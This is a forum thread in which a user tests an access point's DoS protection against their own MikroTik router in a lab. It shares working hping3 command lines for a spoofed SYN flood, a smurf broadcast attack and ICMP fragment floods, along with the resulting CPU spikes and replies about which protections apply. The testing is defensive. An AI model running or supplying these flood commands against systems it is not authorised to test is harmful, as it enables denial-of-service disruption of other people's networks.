DoS Protection not working

2019-03-24 07_39_10-Window.png

HW INFO:
-Mikrotik RB951
-Cisco Switch 3750
-CnPilot e410
 
SW INFO:
-Mikrotik as dhcp server for vlan10 and vlan 20
-my PC1 running Kali linux vm inside vmware workstation
 
GOALS:
-prevent all DoS attack from wireless users
 
STEPS TAKEN:
-enable all Network/DoS Protection in AP GUI
-in Mikrotik run this to monitor cpu spike
> system resource monitor
-in Kali vm run this to attack Mikrotik
  1. ip spoof
    hping3 -c 10000 -d 120 -S -w 64 --flood --rand-source 192.168.88.1
    RESULT: cpu spike
     
  2. smurf attack
    # hping3 -1 --flood --spoof 192.168.88.1 192.168.88.255
    RESULT: cpu spike
     
  3. ip spoof log
     
     
  4. icmp fragment
# hping3 -1 -f -x 192.168.88.1
RESULT: mikrotik already immune to this attack by default
 
QUESTIONS:
-what I miss in my steps
-how to simulate "ip spoof log" attack
 
tq

You are doing icmp flood, as i can see in manual there are 4 options in dos protection, none of them is for icmp flood so all is good…

https://download.csdn.net/download/u013003382/9868661 said
Smurf is a DoS attacking method. In this flood attack, it floods the victim with the ICMP echo packets instead of TCP SYN packets. Also, it is a spoofed broadcast ping request using the victim IP address as the Source IP.
Most of the modern devices can deter these kind of attacks and SMURF is rarely a threat today.
# hping3 -1 --flood --spoof <target> <broadcast_address>

so I modify my command a bit

# hping3 -1 --flood --spoof 192.168.88.1 192.168.88.255

https://cybersecurityturkey.com/2018/11/08/hping-komutlari/

# hping3 -1 --flood -a 192.168.88.1 192.168.88.255

RESULT:

-cpu spike between 22%-48& after attack

before attack is only 9%